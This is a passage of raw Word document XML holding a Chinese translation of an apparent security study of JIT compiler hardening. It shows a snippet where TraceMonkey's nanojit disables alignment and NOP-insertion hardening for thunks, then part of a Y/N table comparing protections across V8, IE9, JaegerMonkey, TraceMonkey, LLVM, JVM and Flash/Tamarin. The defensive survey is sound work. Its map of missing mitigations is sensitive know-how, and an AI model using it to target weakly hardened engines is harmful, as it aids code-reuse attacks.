          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>在编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>thunk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>时禁用强化功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>nanojit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> :: Config </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>cfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = core-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>config.njconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>cfg.harden_function_alignment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = false; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>cfg.harden_nop_insertion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB644A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D345ED" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="118" w:line="295" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>至关重要的是，将这些保护机制应用于所有JIT生成的代码，以防止攻击者在其中找到可重用的代码块</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E53CF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F522DAC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="407"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注意：我们调查了每个引擎是否使用随机NOP插入，但是对于某些引擎，未知是否有针对</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此保护</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>机制的异常（例如上述异常）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF1AE4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA77CE3" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_bookmark20"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT强化比较</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6EE536" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="45"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5C0CCD" w14:textId="4579FE7E" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们调查了许多竞争的JIT引擎。一些引擎是</w:t>
      </w:r>
      <w:r w:rsidR="005C7515">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Method </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT，而其他引擎则是</w:t>
      </w:r>
      <w:r w:rsidR="005C7515">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="005C7515">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">racing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT。评估每个JIT的上述硬化技术。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7563F98C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>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39"/>
        <w:gridCol w:w="666"/>
        <w:gridCol w:w="710"/>
        <w:gridCol w:w="1169"/>
        <w:gridCol w:w="1110"/>
        <w:gridCol w:w="888"/>
        <w:gridCol w:w="784"/>
        <w:gridCol w:w="1169"/>
      </w:tblGrid>
      <w:tr w:rsidR="0026102A" w14:paraId="07B26028" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="840"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17697157" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="432DC549" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="166" w:right="145"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>V8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DF66194" w14:textId="74303525" w:rsidR="0026102A" w:rsidRDefault="005C7515">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="109" w:right="87"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>IE9</w:t>
            </w:r>
            <w:r w:rsidR="00691AB9">
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> *</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="000A3F5D" w14:textId="23BF56C4" w:rsidR="0026102A" w:rsidRPr="005C7515" w:rsidRDefault="005C7515">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="242" w:lineRule="auto"/>
              <w:ind w:left="166" w:right="122" w:firstLine="53"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>J</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ae</w:t>
            </w:r>
            <w:r w:rsidR="000D3EB1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>gerMonkey</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="242D8909" w14:textId="7ADFC20B" w:rsidR="0026102A" w:rsidRPr="000D3EB1" w:rsidRDefault="000D3EB1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="242" w:lineRule="auto"/>
              <w:ind w:left="137" w:right="92" w:firstLine="117"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>race Monkey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01EEE53B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="113" w:right="87"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>LLVM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="784" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44DCCA12" w14:textId="5793257B" w:rsidR="0026102A" w:rsidRPr="000D3EB1" w:rsidRDefault="000D3EB1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="135" w:right="108"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>J</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="118363E9" w14:textId="77777777" w:rsidR="000D3EB1" w:rsidRDefault="000D3EB1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="242" w:lineRule="auto"/>
              <w:ind w:left="162" w:firstLine="66"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>lash/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6540F2E0" w14:textId="119162AE" w:rsidR="0026102A" w:rsidRPr="000D3EB1" w:rsidRDefault="000D3EB1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="242" w:lineRule="auto"/>
              <w:ind w:left="162" w:firstLine="66"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Tamarin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="105E24F8" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="920"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="611F9DC5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="242" w:lineRule="auto"/>
              <w:ind w:left="716" w:right="636" w:hanging="41"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>安全页面权限</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14F47419" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="21"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01169B48" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="22"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B4FD579" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20BD6544" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="470"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CE2ACA2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="26"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="784" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F058EE7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="27"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53481BC5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="29"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="54388372" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="280"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06BCEDC1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="108" w:right="88"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>保护页面</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18F9A64F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="21"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C6DEA15" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="109" w:right="87"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N **</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FBA091C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EFC5D12" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="470"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="328B7CF1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="26"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="784" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C44F7B4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="260" w:lineRule="exact"/>
              <w:ind w:left="27"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
